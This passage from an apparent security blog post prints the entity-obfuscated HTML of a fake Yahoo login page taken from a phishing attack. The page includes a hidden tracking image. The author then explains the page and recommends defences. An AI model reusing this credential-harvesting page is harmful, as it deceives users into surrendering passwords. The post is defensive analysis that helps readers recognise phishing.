  ac0e190d8267e36708f955d7ab048990d = "";
  acaf1a3dfb505ffed0d024130f58c5cfa = "";
  ae0c641195b27425bb056ac56f8953d24 = "";
}
(repeated 1 time)
<!DOCTYPE html><html lang="en-US" class=
"&#121;&#117;&#105;&#51;&#45;&#106;&#115;&#45;&#101;&#110;&#97;&#98;&#108;&#101;&#100;"><head><meta 
http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Yahoo - login</title><meta name=
"&#118;&#105;&#101;&#119;&#112;&#111;&#114;&#116;" content=
"initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no"><link rel="stylesheet" type=
"&#116;&#101;&#120;&#116;&#47;&#99;&#115;&#115;" href=
"&#47;&#121;&#104;&#109;&#118;_&#102;&#105;&#108;&#101;&#115;&#47;&#99;&#111;&#109;&#98;&#111;&#46;&
#99;&#115;&#115;"></head>        <body onload="f1.p.focus();" class=
"&#105;&#111;&#115;&#45;&#100;&#121;&#110;&#97;&#109;&#105;&#99;&#45;&#102;&#111;&#110;&#116;"><div 
id="&#109;&#98;&#114;&#45;&#109;&#111;&#98;&#105;&#108;&#101;&#45;&#108;&#111;&#103;&#105;&#110;" 
class="&#109;&#98;&#114;&#45;&#108;&#111;&#103;&#105;&#110; &#109;&#98;&#114;&#45;&#109;&#98; ">
<script>var MBR_config = {
  baseSpaceID : "150002880", YWAProjectID : 10001756605956, DocumentName : "Mobile Login", 
  DocumentGroup : "Mobile Login", bouncer_login : "
https://login.yahoo.com/config/login?.partner=ycorp&.src=ym&mho=1&.done=https%3A%2F%2Fmail
.yahoo.com"
}
;
</script><main role="main" id=
"&#121;&#117;&#105;_&#51;_&#49;&#56;_&#49;_&#55;_&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&
#48;&#49;&#50;_&#50;&#53;" style=
"-webkit-user-select: none; touch-action: pan-y; -webkit-user-drag: none; -webkit-tap-highlight-colo
r: rgba(0, 0, 0, 0);"><div class="&#109;&#98;&#114;&#45;&#109;&#97;&#105;&#110;" id=
"&#121;&#117;&#105;_&#51;_&#49;&#56;_&#49;_&#55;_&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&
#48;&#49;&#50;_&#49;&#48;&#54;"><header id=
"&#121;&#117;&#105;_&#51;_&#49;&#56;_&#49;_&#55;_&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&
#48;&#49;&#50;_&#49;&#48;&#53;"><div class=
"&#109;&#98;&#114;&#45;&#109;&#98;&#45;&#104;&#100;&#114;"><div class=
"&#104;&#101;&#97;&#100;&#101;&#114;&#45;&#99;&#111;&#110;&#116;&#97;&#105;&#110;&#101;&#114;"><img 
src=
"&#47;&#121;&#104;&#109;&#118;_&#102;&#105;&#108;&#101;&#115;&#47;&#121;&#97;&#104;&#111;&#111;_&#10
1;&#110;&#45;&#85;&#83;_&#102;_&#112;_&#98;&#101;&#115;&#116;&#102;&#105;&#116;_&#50;&#120;&#46;&#11
2;&#110;&#103;" alt="&#89;&#97;&#104;&#111;&#111;"></div></div></header><p class=
"&#109;&#98;&#114;&#45;&#109;&#98;&#45;&#108;&#111;&#103;&#105;&#110;&#45;&#116;&#105;&#116;&#108;&#
101; &#109;&#98;&#114;&#45;&#116;&#101;&#120;&#116;&#45;&#49;&#51;">&#83;&#105;&#103;&#110; &#105;
&#110; &#116;&#111; &#121;&#111;&#117;&#114; &#97;&#99;&#99;&#111;&#117;&#110;&#116;</p><form 
method="&#112;&#111;&#115;&#116;" name="&#102;&#49;" id="" action="" class=
"&#112;&#117;&#114;&#101;&#45;&#102;&#111;&#114;&#109; &#112;&#117;&#114;&#101;&#45;&#102;&#111;&#11
4;&#109;&#45;&#115;&#116;&#97;&#99;&#107;&#101;&#100; &#109;&#98;&#114;&#45;&#109;&#98;&#45;&#108;&#
111;&#103;&#105;&#110;&#45;&#102;&#114;&#109;" novalidate="">    <fieldset class=
"&#112;&#117;&#114;&#101;&#45;&#103;&#114;&#111;&#117;&#112; &#109;&#98;&#45;&#102;&#115;&#101;&#116
;" id=
"&#121;&#117;&#105;_&#51;_&#49;&#56;_&#49;_&#55;_&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&
#48;&#49;&#50;_&#49;&#48;&#56;">        <div class=
"&#117;&#115;&#101;&#114;&#110;&#97;&#109;&#101;&#45;&#102;&#105;&#101;&#108;&#100; &#112;&#117;&#11
4;&#101;&#45;&#103; &#102;&#111;&#99;&#117;&#115;" id=
"&#121;&#117;&#105;_&#51;_&#49;&#56;_&#49;_&#55;_&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&
#48;&#49;&#50;_&#49;&#48;&#55;">                        <div id=
"&#108;&#111;&#103;&#105;&#110;&#45;&#99;&#111;&#117;&#110;&#116;&#114;&#121;&#45;&#99;&#111;&#100;&
#101;&#45;&#102;&#105;&#101;&#108;&#100;" class=
"&#112;&#117;&#114;&#101;&#45;&#117; &#115;&#101;&#108;&#101;&#99;&#116;&#101;&#100;&#45;&#99;&#111;
&#117;&#110;&#116;&#114;&#121;&#45;&#99;&#111;&#100;&#101; &#110;&#97;&#114;&#114;&#111;&#119; &#109
;&#98;&#114;&#45;&#104;&#105;&#100;&#101;">                <div class=
"&#115;&#101;&#108;&#101;&#99;&#116;&#45;&#99;&#111;&#117;&#110;&#116;&#114;&#121;&#45;&#99;&#111;&#
100;&#101; &#109;&#98;&#114;&#45;&#104;&#105;&#100;&#101;" id=
"&#108;&#111;&#103;&#105;&#110;&#45;&#99;&#111;&#117;&#110;&#116;&#114;&#121;&#45;&#99;&#111;&#100;&
#101;">                    <span id=
"&#108;&#111;&#103;&#105;&#110;&#45;&#99;&#111;&#117;&#110;&#116;&#114;&#121;&#45;&#110;&#97;&#109;&
#101;" class="&#109;&#98;&#114;&#45;&#104;&#105;&#100;&#101;">&#85;&#110;&#105;&#116;&#101;&#100; 
&#83;&#116;&#97;&#116;&#101;&#115; &#40;&#43;&#49;&#41;</span>                     <span>&#43;&#49;
</span>                    <span class=
"&#99;&#111;&#117;&#110;&#116;&#114;&#121;&#45;&#99;&#111;&#100;&#101;&#45;&#97;&#114;&#114;&#111;&#
119;&#45;&#99;&#111;&#110;&#116;&#97;&#105;&#110;&#101;&#114;"><span class=
"&#99;&#111;&#117;&#110;&#116;&#114;&#121;&#45;&#99;&#111;&#100;&#101;&#45;&#97;&#114;&#114;&#111;&#
119;"></span></span>                </div>                <label class=
"&#109;&#98;&#114;&#45;&#104;&#105;&#100;&#101;" for=
"&#108;&#111;&#103;&#105;&#110;&#45;&#115;&#101;&#108;&#101;&#99;&#116;&#45;&#99;&#111;&#117;&#110;&
#116;&#114;&#121;&#45;&#99;&#111;&#100;&#101;">Country menu</label>            </div>
                        <input id=
"&#108;&#111;&#103;&#105;&#110;&#45;&#117;&#115;&#101;&#114;&#110;&#97;&#109;&#101;" type=
"&#101;&#109;&#97;&#105;&#108;" name="&#117;&#115;&#101;&#114;&#110;&#97;&#109;&#101;" class=
"&#112;&#117;&#114;&#101;&#45;&#105;&#110;&#112;&#117;&#116;&#45;&#49; " aria-required="true" 
placeholder="Email address" autocorrect="off" autocomplete="off" autocapitalize="off" title=
"&#69;&#109;&#97;&#105;&#108; &#97;&#100;&#100;&#114;&#101;&#115;&#115;" value=
"&#100;&#110;&#108;&#111;&#110;&#103;&#101;&#110;&#64;&#121;&#97;&#104;&#111;&#111;&#46;&#99;&#111;&
#109;" data-rapid_p="1">            <div class=
"&#112;&#117;&#114;&#101;&#45;&#117;&#45;&#49; &#99;&#108;&#111;&#115;&#101;&#45;&#105;&#99;&#111;&#
110; &#99;&#108;&#111;&#115;&#101;&#45;&#105;&#99;&#111;&#110;&#45;&#117;&#110;&#97;&#109;&#101; &#1
09;&#98;&#114;&#45;&#104;&#105;&#100;&#101;">                <span class=
"&#99;&#108;&#111;&#115;&#101;&#45;&#105;&#99;&#111;&#110; &#99;&#108;&#111;&#115;&#101;&#45;&#105;&
#99;&#111;&#110;&#45;&#98;&#117;&#116;&#116;&#111;&#110;"></span>            </div>        </div>
        <div id="&#112;&#97;&#115;&#115;&#119;&#100;&#45;&#102;&#105;&#101;&#108;&#100;" class=
"&#112;&#97;&#115;&#115;&#119;&#100;&#45;&#102;&#105;&#101;&#108;&#100; &#104;&#97;&#115;&#45;&#109;
&#101;&#115;&#115;&#97;&#103;&#101; ">            <input id=
"&#108;&#111;&#103;&#105;&#110;&#45;&#112;&#97;&#115;&#115;&#119;&#100;" type=
"&#112;&#97;&#115;&#115;&#119;&#111;&#114;&#100;" class=
"&#112;&#117;&#114;&#101;&#45;&#105;&#110;&#112;&#117;&#116;&#45;&#49; " aria-required="true" 
placeholder="Password" autocorrect="off" autocomplete="off" autocapitalize="off" name="&#112;" 
title="&#80;&#97;&#115;&#115;&#119;&#111;&#114;&#100;" data-rapid_p="2">            <div class=
"&#112;&#117;&#114;&#101;&#45;&#117;&#45;&#49; &#99;&#108;&#111;&#115;&#101;&#45;&#105;&#99;&#111;&#
110; &#99;&#108;&#111;&#115;&#101;&#45;&#105;&#99;&#111;&#110;&#45;&#112;&#97;&#115;&#115;&#119;&#10
0; &#109;&#98;&#114;&#45;&#104;&#105;&#100;&#101;">                <span class=
"&#99;&#108;&#111;&#115;&#101;&#45;&#105;&#99;&#111;&#110; &#99;&#108;&#111;&#115;&#101;&#45;&#105;&
#99;&#111;&#110;&#45;&#98;&#117;&#116;&#116;&#111;&#110;"></span>            </div>            <div 
id=
"&#108;&#111;&#103;&#105;&#110;&#45;&#112;&#97;&#115;&#115;&#119;&#100;&#45;&#109;&#101;&#115;&#115;
&#97;&#103;&#101;" class=
"&#112;&#97;&#115;&#115;&#119;&#100;&#45;&#109;&#101;&#115;&#115;&#97;&#103;&#101; &#112;&#117;&#114
;&#101;&#45;&#117;&#45;&#49; &#109;&#98;&#114;&#45;&#104;&#105;&#100;&#101;">                &#84;
&#97;&#112; &#99;&#111;&#110;&#116;&#105;&#110;&#117;&#101; &#116;&#111; &#114;&#101;&#99;&#101;
&#105;&#118;&#101; &#97;&#110; &#111;&#110;&#45;&#100;&#101;&#109;&#97;&#110;&#100; &#112;&#97;
&#115;&#115;&#119;&#111;&#114;&#100;&#46;            </div>        </div>    </fieldset>    <span 
class=
"&#109;&#98;&#114;&#45;&#101;&#114;&#114;&#111;&#114; &#109;&#98;&#114;&#45;&#104;&#105;&#100;&#101;
" id="&#109;&#98;&#114;&#45;&#101;&#114;&#114;&#111;&#114;" role="alert" code="0"></span>    <span 
class=
"&#109;&#98;&#114;&#45;&#101;&#114;&#114;&#111;&#114; &#109;&#98;&#114;&#45;&#104;&#105;&#100;&#101;
" id="&#110;&#119;&#45;&#101;&#114;&#114;&#111;&#114;" role="alert">&#78;&#101;&#116;&#119;&#111;
&#114;&#107; &#99;&#111;&#110;&#110;&#101;&#99;&#116;&#105;&#111;&#110; &#116;&#105;&#109;&#101;
&#100; &#111;&#117;&#116;&#46; &#80;&#108;&#101;&#97;&#115;&#101; &#116;&#114;&#121; &#97;&#103;
&#97;&#105;&#110;&#46;</span>        <button type="&#115;&#117;&#98;&#109;&#105;&#116;" class=
"&#112;&#117;&#114;&#101;&#45;&#98;&#117;&#116;&#116;&#111;&#110; &#112;&#117;&#114;&#101;&#45;&#117
;&#45;&#49; &#112;&#117;&#114;&#101;&#101;&#45;&#98;&#117;&#116;&#116;&#111;&#110;&#45;&#112;&#114;&
#105;&#109;&#97;&#114;&#121; &#109;&#98;&#114;&#45;&#98;&#117;&#116;&#116;&#111;&#110;&#45;&#112;&#1
17;&#114;&#112;&#108;&#101; " name="&#115;&#105;&#103;&#110;&#105;&#110;" data-rapid_slk="signin" 
data-rapid_p="3" value="" id=
"&#108;&#111;&#103;&#105;&#110;&#45;&#115;&#105;&#103;&#110;&#105;&#110;">&#83;&#105;&#103;&#110; 
&#73;&#110;</button>        <div id=
"&#121;&#97;&#104;&#111;&#111;&#45;&#106;&#97;&#112;&#97;&#110;&#45;&#99;&#111;&#110;&#116;&#97;&#10
5;&#110;&#101;&#114;" class="&#109;&#98;&#114;&#45;&#104;&#105;&#100;&#101;">        <a href=
"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#119;&#119;&#119;&#46;&#121;&#97;&#104;&#111;&#111;&#45;&#1
04;&#101;&#108;&#112;&#46;&#106;&#112;&#47;&#97;&#112;&#112;&#47;&#97;&#110;&#115;&#119;&#101;&#114;
&#115;&#47;&#100;&#101;&#116;&#97;&#105;&#108;&#47;&#112;&#47;&#53;&#54;&#53;&#47;&#97;_&#105;&#100;
&#47;&#52;&#55;&#55;&#49;&#51;&#63;&#115;&#111;&#99;_&#115;&#114;&#99;&#61;&#109;&#97;&#105;&#108;&#
38;&#115;&#111;&#99;_&#116;&#114;&#107;&#61;&#109;&#97;" class=
"&#112;&#117;&#114;&#101;&#45;&#117;&#45;&#49; &#112;&#117;&#114;&#101;&#45;&#98;&#117;&#116;&#116;&
#111;&#110; " data-rapid_p="4">            &#86;&#105;&#115;&#105;&#116; &#89;&#97;&#104;&#111;
&#111; &#72;&#101;&#108;&#112;        </a>        <div class=
"&#109;&#98;&#114;&#45;&#108;&#111;&#103;&#105;&#110;&#45;&#111;&#97;&#117;&#116;&#104;&#50;&#45;&#1
21;&#97;&#104;&#111;&#111;&#45;&#106;&#97;&#112;&#97;&#110;&#45;&#109;&#115;&#103;">            
&#89;&#97;&#104;&#111;&#111; &#74;&#97;&#112;&#97;&#110; &#117;&#115;&#101;&#114;&#115; &#45; &#112;
&#108;&#101;&#97;&#115;&#101; &#118;&#105;&#115;&#105;&#116; &#89;&#97;&#104;&#111;&#111; &#72;
&#101;&#108;&#112; &#116;&#111; &#108;&#101;&#97;&#114;&#110; &#104;&#111;&#119; &#116;&#111; &#97;
&#100;&#100; &#121;&#111;&#117;&#114; &#101;&#109;&#97;&#105;&#108; &#97;&#100;&#100;&#114;&#101;
&#115;&#115;&#46;        </div>    </div>    <input type="&#104;&#105;&#100;&#100;&#101;&#110;" 
name="_&#116;&#115;" value="&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#51;" id=
"&#121;&#117;&#105;_&#51;_&#49;&#56;_&#49;_&#55;_&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&
#48;&#49;&#50;_&#50;&#54;" data-rapid_p="5">    <input type="&#104;&#105;&#100;&#100;&#101;&#110;" 
name="_&#116;&#112;&#97;" value="" id=
"&#121;&#117;&#105;_&#51;_&#49;&#56;_&#49;_&#55;_&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&
#48;&#49;&#50;_&#50;&#55;" data-rapid_p="6">    <input type="&#104;&#105;&#100;&#100;&#101;&#110;" 
name="_&#109;&#117;&#104;" value="" id=
"&#121;&#117;&#105;_&#51;_&#49;&#56;_&#49;_&#55;_&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&
#48;&#49;&#50;_&#50;&#56;" data-rapid_p="7">    <input type="&#104;&#105;&#100;&#100;&#101;&#110;" 
name="_&#99;&#114;&#117;&#109;&#98;" value=
"&#105;&#84;&#70;&#117;&#69;&#116;&#103;&#121;&#46;&#114;&#71;" id=
"&#121;&#117;&#105;_&#51;_&#49;&#56;_&#49;_&#55;_&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&
#48;&#49;&#50;_&#50;&#57;" data-rapid_p="8">    <input type="&#104;&#105;&#100;&#100;&#101;&#110;" 
name="_&#117;&#117;&#105;&#100;" value=
"&#112;&#55;&#122;&#74;&#52;&#65;&#48;&#117;&#72;&#79;&#102;&#121;" id=
"&#121;&#117;&#105;_&#51;_&#49;&#56;_&#49;_&#55;_&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&
#48;&#49;&#50;_&#51;&#48;" data-rapid_p="9">    <input type="&#104;&#105;&#100;&#100;&#101;&#110;" 
name="_&#115;&#101;&#113;&#105;&#100;" value="&#50;" id=
"&#121;&#117;&#105;_&#51;_&#49;&#56;_&#49;_&#55;_&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&
#48;&#49;&#50;_&#51;&#49;" data-rapid_p="10"><img src=
"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#119;&#104;&#111;&#115;&#46;&#97;&#109;&#117;&#110;&#103;&#
46;&#117;&#115;&#47;&#115;&#119;&#105;&#100;&#103;&#101;&#116;&#47;&#112;&#117;&#108;&#101;&#110;&#1
16;&#97;&#115;&#117;&#46;&#112;&#110;&#103;" width=0 height=0 />    <input type=
"&#104;&#105;&#100;&#100;&#101;&#110;" name=
"&#111;&#116;&#112;_&#99;&#104;&#97;&#110;&#110;&#101;&#108;" value="" id=
"&#121;&#117;&#105;_&#51;_&#49;&#56;_&#49;_&#55;_&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&
#48;&#49;&#50;_&#51;&#50;" data-rapid_p="11">    <input type="&#104;&#105;&#100;&#100;&#101;&#110;" 
name="&#111;&#116;&#112;_&#114;&#101;&#102;_&#99;&#99;_&#105;&#110;&#116;&#108;" value="" id=
"&#121;&#117;&#105;_&#51;_&#49;&#56;_&#49;_&#55;_&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&
#48;&#49;&#50;_&#51;&#51;" data-rapid_p="12"></form><div class=
"&#112;&#117;&#114;&#101;&#45;&#117;&#45;&#49; &#109;&#98;&#114;&#45;&#104;&#105;&#100;&#101;">    
<div class="&#109;&#98;&#114;&#45;&#111;&#116;&#112;&#45;&#108;&#105;&#110;&#107;">        <form 
method="&#71;&#69;&#84;" action="" class=
"&#112;&#117;&#114;&#101;&#45;&#102;&#111;&#114;&#109; &#109;&#98;&#114;&#45;&#109;&#98;&#45;&#108;&
#111;&#103;&#105;&#110;&#45;&#102;&#114;&#109;" novalidate="">            <input type=
"&#104;&#105;&#100;&#100;&#101;&#110;" name="&#46;&#111;&#116;&#112;" value="&#121;" id=
"&#121;&#117;&#105;_&#51;_&#49;&#56;_&#49;_&#55;_&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&
#48;&#49;&#50;_&#51;&#52;" data-rapid_p="13">            <button id=
"&#108;&#111;&#103;&#105;&#110;&#45;&#111;&#116;&#112;" type="&#115;&#117;&#98;&#109;&#105;&#116;" 
class="&#109;&#98;&#114;&#45;&#98;&#117;&#116;&#116;&#111;&#110;&#45;&#116;&#101;&#120;&#116;" 
data-rapid_p="14">&#77;&#66;&#82;_&#79;&#84;&#80;_&#83;&#73;&#71;&#78;&#73;&#78;_&#85;&#83;&#73;
&#78;&#71;_&#77;&#79;&#66;&#73;&#76;&#69;_&#78;&#85;&#77;&#66;&#69;&#82;</button>        </form>    
</div></div><script>MBR_config.otp_enabled = false;
MBR_config.otp_optin = true;
MBR_config.strings = MBR_config.strings || {
  placeholder_mobile_number : "Mobile number", placeholder_username : "Email address", 
  sign_in : "Sign In", get_my_passwd : "Continue", signin_continue : "Continue", 
  odp_password_desc : "Tap continue to receive an on-demand password.", odp_push_desc : 
  "Tap continue to use Account Key.", error_username_passwd : 
  "Invalid username/password. Please try again.", error_invalid_passwd : 
  "That didn?t work. Please type your on-demand password again.", error_empty_passwd : 
  "Your on-demand password is required.", otp_retry_message : 
  "Please wait {0} seconds before trying to resend.", otp_retry_message_one : 
  "Please wait a second before trying to resend.", end_of_string : "EOS"
}
;
MBR_config.click_to_dismiss_spinner_login = 1;
MBR_config.click_to_dismiss_spinner_captcha = 1;
MBR_config.is_asdk = 0;
MBR_config.use_odp_username_monitor = false;
MBR_config.is_oauth2 = false;
MBR_config.oauth2_yahoo_japan_redirect_url = 
"http://www.yahoo-help.jp/app/answers/detail/p/565/a_id/47713?soc_src=mail&soc_trk=ma";
</script><div class=
"&#109;&#98;&#114;&#45;&#102;&#111;&#114;&#103;&#111;&#116;&#112;&#119;&#100; " id=
"&#121;&#117;&#105;_&#51;_&#49;&#56;_&#49;_&#55;_&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#51;&#50;&
#55;&#49;&#48;_&#57;&#54;"><a id=
"&#109;&#98;&#114;&#45;&#102;&#111;&#114;&#103;&#111;&#116;&#45;&#108;&#105;&#110;&#107;" href=
"&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#101;&#100;&#105;&#116;&#46;&#121;&#97;&#104;&#111;&#
111;&#46;&#99;&#111;&#109;&#47;&#99;&#111;&#110;&#102;&#105;&#103;&#47;&#101;&#118;&#97;&#108;_&#102
;&#111;&#114;&#103;&#111;&#116;_&#112;&#119;&#63;&#108;&#97;&#110;&#103;&#61;&#101;&#110;&#45;&#85;&
#83;&#38;&#105;&#110;&#116;&#108;&#61;&#117;&#115;&#38;&#100;&#111;&#110;&#101;&#61;&#104;&#116;&#11
6;&#112;&#115;&#37;&#51;&#65;&#37;&#50;&#70;&#37;&#50;&#70;&#117;&#115;&#46;&#121;&#97;&#104;&#111;&
#111;&#46;&#99;&#111;&#109;&#37;&#50;&#70;&#37;&#51;&#70;&#112;&#37;&#51;&#68;&#117;&#115;&#38;&#115
;&#114;&#99;&#61;&#102;&#112;&#99;&#116;&#120;" class=
"&#112;&#117;&#114;&#101;&#45;&#117;&#45;&#49;" role="button" data-rapid_slk="recover" data-rapid_p=
"15">&#67;&#97;&#110;&#39;&#116; &#97;&#99;&#99;&#101;&#115;&#115; &#121;&#111;&#117;&#114; &#97;
&#99;&#99;&#111;&#117;&#110;&#116;&#63;</a></div><div class=
"&#109;&#98;&#114;&#45;&#109;&#98;&#45;&#99;&#114;&#101;&#97;&#116;&#101;&#97;&#99;&#99; &#112;&#117
;&#114;&#101;&#45;&#102;&#111;&#114;&#109;&#45;&#115;&#116;&#97;&#99;&#107;&#101;&#100; &#109;&#98;&
#114;&#45;&#116;&#101;&#120;&#116;&#45;&#49;&#51; &#104;&#97;&#115;&#45;&#100;&#101;&#118;&#105;&#99
;&#101;&#45;&#115;&#119;&#105;&#116;&#99;&#104;&#101;&#114;"><span>&#78;&#101;&#119; &#116;&#111; 
&#89;&#97;&#104;&#111;&#111;&#63;</span><button id=
"&#99;&#114;&#101;&#97;&#116;&#101;&#97;&#99;&#99;" regurl=
"https://edit.yahoo.com/registration?.lang=en-US&amp;.intl=us&amp;.src=fpctx&amp;.asdk_embedded=0&am
p;.done=https%3A%2F%2Fus.yahoo.com%2F%3Fp%3Dus" class=
"&#112;&#117;&#114;&#101;&#45;&#98;&#117;&#116;&#116;&#111;&#110; &#109;&#98;&#114;&#45;&#98;&#117;&
#116;&#116;&#111;&#110;&#45;&#116;&#101;&#120;&#116;" data-rapid_slk="signup" data-rapid_p="16">
&#83;&#105;&#103;&#110; &#117;&#112; &#102;&#111;&#114; &#97; &#110;&#101;&#119; &#97;&#99;&#99;
&#111;&#117;&#110;&#116;</button></div><div class=
"&#109;&#98;&#114;&#45;&#100;&#115;&#45;&#99;&#111;&#110;&#116;&#97;&#105;&#110;&#101;&#114;"><div 
id="&#109;&#98;&#114;&#45;&#100;&#115;" class=
"&#112;&#117;&#114;&#101;&#45;&#117;&#45;&#49; &#109;&#98;&#114;&#45;&#109;&#98;&#45;&#100;&#115;">
<div class="&#112;&#117;&#114;&#101;&#45;&#117;&#45;&#49; &#108;&#105;&#110;&#107;&#115;"><a id=
"&#109;&#98;&#114;&#45;&#100;&#101;&#118;&#105;&#99;&#101;&#45;&#115;&#119;&#105;&#116;&#99;&#104;&#
101;&#114;&#45;&#108;&#105;&#110;&#107;" href=
"&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#108;&#111;&#103;&#105;&#110;&#46;&#121;&#97;&#104;&#
111;&#111;&#46;&#99;&#111;&#109;&#47;&#63;&#109;&#98;&#115;&#119;&#61;&#100;&#38;&#46;&#115;&#114;&#
99;&#61;&#102;&#112;&#99;&#116;&#120;&#38;&#46;&#105;&#110;&#116;&#108;&#61;&#117;&#115;&#38;&#46;&#
108;&#97;&#110;&#103;&#61;&#101;&#110;&#45;&#85;&#83;&#38;&#46;&#100;&#111;&#110;&#101;&#61;&#104;&#
116;&#116;&#112;&#115;&#37;&#51;&#65;&#37;&#50;&#70;&#37;&#50;&#70;&#117;&#115;&#46;&#121;&#97;&#104
;&#111;&#111;&#46;&#99;&#111;&#109;&#37;&#50;&#70;&#37;&#51;&#70;&#112;&#37;&#51;&#68;&#117;&#115;" 
data-rapid_p="17">&#86;&#105;&#101;&#119; &#100;&#101;&#115;&#107;&#116;&#111;&#112; &#118;&#101;
&#114;&#115;&#105;&#111;&#110;</a></div></div></div></div></main><div class=
"&#115;&#112;&#105;&#110;&#45;&#109;&#97;&#115;&#107;"><div class=
"&#99;&#101;&#110;&#116;&#101;&#114;"><div class=
"&#115;&#105;&#103;&#110;&#45;&#105;&#110;&#45;&#115;&#112;&#105;&#110;&#110;&#101;&#114;"></div>
</div></div></div><script src=
"&#47;&#121;&#104;&#109;&#118;_&#102;&#105;&#108;&#101;&#115;&#47;&#99;&#111;&#109;&#98;&#111;&#49;&
#46;&#99;&#115;&#115;"></script><div id=
"&#121;&#117;&#105;&#51;&#45;&#99;&#115;&#115;&#45;&#115;&#116;&#97;&#109;&#112;" style=
"position: absolute !important; visibility: hidden !important"></div><div id=
"&#121;&#117;&#105;&#51;&#45;&#99;&#115;&#115;&#45;&#115;&#116;&#97;&#109;&#112;" style=
"position: absolute !important; visibility: hidden !important"></div><script>YUI().use('node', 'event', function (Y){
  Y.on("domready", function (){
    MBR_config.comscore_config = [{
      c1 : "2", c2 : "7241469", c5 : "150002880", c7 : "
https%3A%2F%2Flogin.yahoo.com%2Fm%3F.src%3Dfpctx&.intl%3Dus&.lang%3Den-US&.done%3Dhttps%25
3A%252F%252Fus.yahoo.com%252F%253Fp%253Dus", c14 : "-1"
    }
    ];
    MBR_config.comscore_beacon();
  }
  );
}
);
</script><noscript>  &amp;lt;img src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#98;&#46;&#115;&#99;&#111;&#114;&#101;&#99;&#97;&#114;&#100;&#114;&#101;&#115;&#101;&#97;&#114;&#99;&#104;&#46;&#99;&#111;&#109;&#47;&#112;&#63;&#99;&#49;&#61;&#50;&#91;&#38;&#93;&#97;&#109;&#112;&#91;&#47;&#59;&#93;&#97;&#109;&#112;&#59;&#99;&#50;&#61;&#55;&#50;&#52;&#49;&#52;&#54;&#57;&#91;&#38;&#93;&#97;&#109;&#112;&#91;&#47;&#59;&#93;&#97;&#109;&#112;&#59;&#99;&#55;&#61;&#104;&#116;&#116;&#112;&#115;&#37;&#51;&#65;&#37;&#50;&#70;&#37;&#50;&#70;&#108;&#111;&#103;&#105;&#110;&#46;&#121;&#97;&#104;&#111;&#111;&#46;&#99;&#111;&#109;&#37;&#50;&#70;&#109;&#37;&#51;&#70;&#46;&#115;&#114;&#99;&#37;&#51;&#68;&#102;&#112;&#99;&#116;&#120;&#37;&#50;&#54;&#46;&#105;&#110;&#116;&#108;&#37;&#51;&#68;&#117;&#115;&#37;&#50;&#54;&#46;&#108;&#97;&#110;&#103;&#37;&#51;&#68;&#101;&#110;&#45;&#85;&#83;&#37;&#50;&#54;&#46;&#100;&#111;&#110;&#101;&#37;&#51;&#68;&#104;&#116;&#116;&#112;&#115;&#37;&#50;&#53;&#51;&#65;&#37;&#50;&#53;&#50;&#70;&#37;&#50;&#53;&#50;&#70;&#117;&#115;&#46;&#121;&#97;&#104;&#111;&#111;&#46;&#99;&#111;&#109;&#37;&#50;&#53;&#50;&#70;&#37;&#50;&#53;&#51;&#70;&#112;&#37;&#50;&#53;&#51;&#68;&#117;&#115;&#91;&#38;&#93;&#97;&#109;&#112;&#91;&#47;&#59;&#93;&#97;&#109;&#112;&#59;&#99;&#53;&#61;&#49;&#53;&#48;&#48;&#48;&#50;&#56;&#56;&#48;&#91;&#38;&#93;&#97;&#109;&#112;&#91;&#47;&#59;&#93;&#97;&#109;&#112;&#59;&#99;&#49;&#52;&#61;&#45;&#49;&#91;&#38;&#93;&#97;&#109;&#112;&#91;&#47;&#59;&#93;&#97;&#109;&#112;&#59;&#99;&#118;&#61;&#50;&#46;&#48;&#91;&#38;&#93;&#97;&#109;&#112;&#91;&#47;&#59;&#93;&#97;&#109;&#112;&#59;&#99;&#106;&#61;&#49;"&amp;gt;</noscript><!-- spaceId Base: 150002880, Intl: 150002880--></body></html>

While this is still largely gibberish, there's enough here to see that this code renders the Yahoo login screen.

Bottom line? Phishing scams use all sorts of tricks to get an unsuspecting user to fall into their trap. Even a professional security analyst can fall for the right phish at the right time. The best defense is a wary eye, along with a few helpful tools:
  1. A password manager such as LastPass or 1Password that recognizes website domains and will not enter your password into a fake login screen; 
  2. Two-factor authentication such that if a scammer does get your password, they still cannot log in without also having your device; and
  3. A DNS resolver such as OpenDNS, that recognizes scam domains and prevents your browser from going there.

Do you have something to add? A question you'd like answered? Think I'm out of my mind? Join the conversation below, reach out by email at david (at) securityforrealpeople.com, or hit me up on Twitter at @dnlongen